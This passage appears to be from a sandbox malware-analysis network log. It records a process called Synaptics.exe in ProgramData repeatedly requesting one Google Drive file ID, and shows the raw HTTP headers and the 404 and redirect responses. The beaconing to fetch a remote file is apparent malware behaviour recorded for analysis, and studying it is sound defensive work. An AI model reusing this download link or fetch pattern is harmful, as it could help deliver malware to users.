                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            98192.168.2.849863142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:38 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4ORFCnUXer_NBTEV4_VBFNLSGiYZUcNyk3A6wW0Rgfql0LvSw4dTTYQJeN1V5wUSWo
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:38 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-VMdnK8K4cmbFBXnAEf02RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:38 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:38 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 35 56 56 70 52 71 53 61 48 49 45 2d 5a 72 51 68 6a 78 51 6d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="C5VVpRqSaHIE-ZrQhjxQmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:38 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            99192.168.2.849864142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:38 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-33mmKliSNVmTHdDllfp8lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            100192.168.2.849865142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5qE4Nx_iXxCHnBI9DZi1XlPA2wvleKFKfTJZ8BrMlCGgdXWMyv6ySsschhsP67qAO6
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-pVZRW9RhZz9WVcbuWr2-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 57 71 78 4f 39 74 31 49 71 42 72 6a 6f 6c 44 6f 68 32 68 38 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="fWqxO9t1IqBrjolDoh2h8A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            101192.168.2.849867142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:39 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            102192.168.2.849868142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            103192.168.2.849869142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:39 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            104192.168.2.849873142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:40 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:40 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-tJtoRo8v6EXgSH3InsL8DA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            105192.168.2.849874142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:40 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:40 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Jdvv0qaufe-EH9PaOh5b_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            106192.168.2.849875142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:41 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ehQXczwueL_AAuCb4iGfFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            107192.168.2.849876142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:41 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6UlvWyEt_GMjgNqOse2oAGV9_aBJtksMds6RcqiBqRE4DcuCphIZUch1OLyBIh3FnUY_iWLsI
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:41 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Lt5DUs7HtH5sPJ7f_7o2iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
